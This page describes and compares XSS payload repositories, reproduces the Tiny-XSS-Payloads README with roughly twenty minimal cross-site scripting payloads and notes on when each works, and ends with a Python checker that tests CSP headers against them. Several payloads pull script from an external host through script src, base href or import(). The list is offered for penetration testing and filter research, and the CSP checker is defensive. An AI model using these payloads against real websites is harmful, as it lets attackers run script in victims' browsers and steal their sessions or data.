Tiny-XSS-Payloads
A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me
Top Related Projects
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Awesome XSS stuff
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Quick Overview
Tiny-XSS-Payloads is a GitHub repository that provides a collection of extremely short Cross-Site Scripting (XSS) payloads. These payloads are designed to be as compact as possible while still being effective, making them useful for bypassing character limitations or evading certain security filters.
Pros
- Offers a wide variety of compact XSS payloads
- Useful for penetration testing and security research
- Regularly updated with new payloads
- Includes explanations and context for many payloads
Cons
- Can be misused for malicious purposes if not handled responsibly
- Some payloads may be outdated or ineffective against modern security measures
- Lacks comprehensive documentation on usage and implementation
- May encourage reliance on pre-made payloads rather than understanding underlying concepts
Code Examples
// Basic alert payload
<svg onload=alert(1)>
// URL-based payload
javascript:alert(1)
// HTML attribute payload
"onmouseover="alert(1)
// Script tag payload
<script>alert(1)</script>
Getting Started
To use these payloads:
- Visit the Tiny-XSS-Payloads repository
- Browse the available payloads in the README.md file
- Copy the desired payload
- Test the payload in a controlled, ethical environment
- Modify as needed for your specific use case
Remember to always use these payloads responsibly and only on systems you have permission to test.
Competitor Comparisons
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
Pros of xss-payload-list
- More comprehensive collection with a wider variety of XSS payloads
- Better organized into categories, making it easier to find specific types of payloads
- Includes additional resources and references for XSS testing
Cons of xss-payload-list
- Larger repository size, potentially overwhelming for beginners
- Less focus on minimizing payload size compared to Tiny-XSS-Payloads
- May include some outdated or less effective payloads due to its broader scope
Code Comparison
Tiny-XSS-Payloads:
<svg/onload=alert()>
<img/src/onerror=alert()>
xss-payload-list:
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
The Tiny-XSS-Payloads examples focus on minimal character count, while xss-payload-list provides more traditional and readable payloads. Tiny-XSS-Payloads uses shorter attribute names and omits quotes where possible, whereas xss-payload-list includes full attribute names and quotation marks for better readability and compatibility across different contexts.
Both repositories serve as valuable resources for XSS testing, with Tiny-XSS-Payloads excelling in payload minimization and xss-payload-list offering a more comprehensive collection for various scenarios.
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Pros of PayloadsAllTheThings
- Comprehensive coverage of various attack vectors beyond XSS
- Well-organized structure with separate directories for different techniques
- Regularly updated with contributions from the security community
Cons of PayloadsAllTheThings
- Larger repository size, potentially overwhelming for beginners
- Less focused on XSS-specific payloads compared to Tiny-XSS-Payloads
- May require more time to navigate and find specific XSS payloads
Code Comparison
Tiny-XSS-Payloads:
<svg/onload=alert()>
<img/src/onerror=alert()>
<video/poster/onerror=alert()>
PayloadsAllTheThings:
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
Both repositories provide concise XSS payloads, but Tiny-XSS-Payloads focuses on more compact and creative variations. PayloadsAllTheThings offers a broader range of payloads, including traditional and modern techniques.
While Tiny-XSS-Payloads excels in providing minimal XSS payloads, PayloadsAllTheThings offers a more extensive collection of security-related payloads and techniques. The choice between the two depends on the user's specific needs and level of expertise in web security testing.
Awesome XSS stuff
Pros of AwesomeXSS
- Comprehensive collection of XSS payloads, techniques, and resources
- Well-organized with categories for different XSS types and bypass methods
- Includes additional tools and references for XSS testing
Cons of AwesomeXSS
- May be overwhelming for beginners due to the large amount of information
- Some payloads might be outdated or less effective against modern security measures
- Lacks focus on minimizing payload size for specific scenarios
Code Comparison
Tiny-XSS-Payloads:
<svg/onload=alert()>
<img/src/onerror=alert()>
AwesomeXSS:
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
Summary
Tiny-XSS-Payloads focuses on compact, efficient XSS payloads, making it ideal for scenarios with strict character limitations. It's straightforward and easy to use for quick testing.
AwesomeXSS offers a more comprehensive approach, covering various XSS techniques, bypass methods, and additional resources. It's better suited for in-depth XSS research and testing across different scenarios.
Both repositories provide valuable XSS payloads, but they cater to different needs. Tiny-XSS-Payloads is best for minimalist, space-constrained exploits, while AwesomeXSS is more suitable for extensive XSS testing and learning.
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Pros of SecLists
- Comprehensive collection of multiple types of security-related lists, not limited to XSS payloads
- Regularly updated with contributions from the security community
- Well-organized directory structure for easy navigation
Cons of SecLists
- Large repository size may be overwhelming for specific use cases
- Requires more time to find relevant payloads due to extensive content
- May include outdated or less effective payloads alongside current ones
Code Comparison
Tiny-XSS-Payloads example:
<svg/onload=alert()>
SecLists example (from XSS-Injection/XSS-Cheat-Sheet-PortSwigger.txt):
<script>alert(document.domain)</script>
Both repositories provide XSS payloads, but Tiny-XSS-Payloads focuses on compact, efficient payloads, while SecLists offers a broader range of options.
SecLists is a more extensive resource covering various security testing aspects, whereas Tiny-XSS-Payloads specializes in concise XSS vectors. SecLists is ideal for comprehensive security assessments, while Tiny-XSS-Payloads is better suited for quick XSS testing or situations where payload size matters.
README
Tiny-XSS-Payloads
A collection of short XSS payloads that can be used in different contexts.
The demo is available here: https://tinyxss.terjanq.me
Current Payloads
<!-- Requires a relative script inserted to the DOM after the sink,
e.g. <base/href=//Ç.⨠> ... <script src=/aaa></script> -->
<base/href=//Ç.⨠>
<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval is not enabled -->
<svg/onload=location=name>
<!-- In Chrome, also works inside innerHTML, even on elements not yet inserted into the DOM -->
<svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<img/src/onerror=eval(`'`+URL)>
<!-- Just a casual script -->
<script/src=//Ç.⨠></script>
<!-- If you control the name of the window -->
<iframe/onload=src=top.name>
<!-- If you control the URL -->
<iframe/onload=eval(`'`+URL)>
<!-- If the number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\Ç.⨠?/>
<!-- For Firefox only -->
<iframe/srcdoc="<svg><script/href=//Ç.⨠ />">
<!-- If the number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\Ç.⨠?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//Ç.⨠></script>">
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because Ç.⨠checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\Ç.⨠/)>
<!-- Uses external script as import, triggers if inline styles are allowed. -->
<!-- The PoC only works on https and Chrome, because Ç.⨠ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\Ç.⨠/)>
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because Ç.⨠checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\Ç.⨠/)>
Deprecated:
<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>
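The comments above state the preconditions each payload needs (inline event handlers, unsafe-eval, a missing base-uri). As an added example that is not part of the Tiny-XSS-Payloads repository, the small checker below reads a Content-Security-Policy header and reports which of those preconditions a policy still leaves open; the payload-to-directive mapping is an assumption stated in the code comments, and the sample policies are constructed.

```python
from __future__ import annotations

# Hypothetical checker, not from Tiny-XSS-Payloads. Assumed mapping from the
# comments in the list above to CSP: every listed payload except <base/href>
# runs an inline event handler (onload=/onerror=); eval(name) and eval(`'`+URL)
# additionally need 'unsafe-eval'; <base/href=//...> is stopped only by an
# explicit base-uri directive, which never falls back to default-src.

NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header: str) -> dict[str, list[str]]:
    """'a b; c d e' -> {'a': ['b'], 'c': ['d', 'e']}, everything lower-cased."""
    policy: dict[str, list[str]] = {}
    for directive in header.split(";"):
        tokens = directive.lower().split()
        if tokens:
            policy[tokens[0]] = tokens[1:]
    return policy


def effective(policy: dict[str, list[str]], name: str) -> list[str] | None:
    """Source list governing a directive; None means it is unrestricted."""
    if name in policy:
        return policy[name]
    # script-src falls back to default-src; base-uri has no fallback at all.
    return None if name == "base-uri" else policy.get("default-src")


def assess(header: str) -> dict[str, bool]:
    """Which payload classes from the list above the policy still permits."""
    script = effective(parse_csp(header), "script-src")
    if script is None:
        handlers = eval_ok = True  # no script policy at all
    else:
        # CSP2+: a nonce- or hash-source makes 'unsafe-inline' ignored, which
        # is what blocks injected onload=/onerror= handlers. Per the comments
        # above, <style/onload> vs <style/onerror> only selects which event
        # fires; the gate for both is still the inline handler, not style-src.
        nonced = any(s.startswith(NONCE_OR_HASH) for s in script)
        handlers = "'unsafe-inline'" in script and not nonced
        eval_ok = handlers and "'unsafe-eval'" in script
    return {
        "inline_event_handlers_run": handlers,  # <svg/onload=...>, <img/src/onerror=...>
        "eval_name_or_url_runs": eval_ok,       # eval(name), eval(`'`+URL)
        "base_href_hijack": effective(parse_csp(header), "base-uri") is None,
    }


if __name__ == "__main__":
    # Constructed sample policies: one permissive, one nonce-based.
    for csp in ("script-src 'self' 'unsafe-inline' 'unsafe-eval' https:",
                "default-src 'none'; script-src 'nonce-r4nd0m'; base-uri 'none'"):
        print(csp, "->", assess(csp))
```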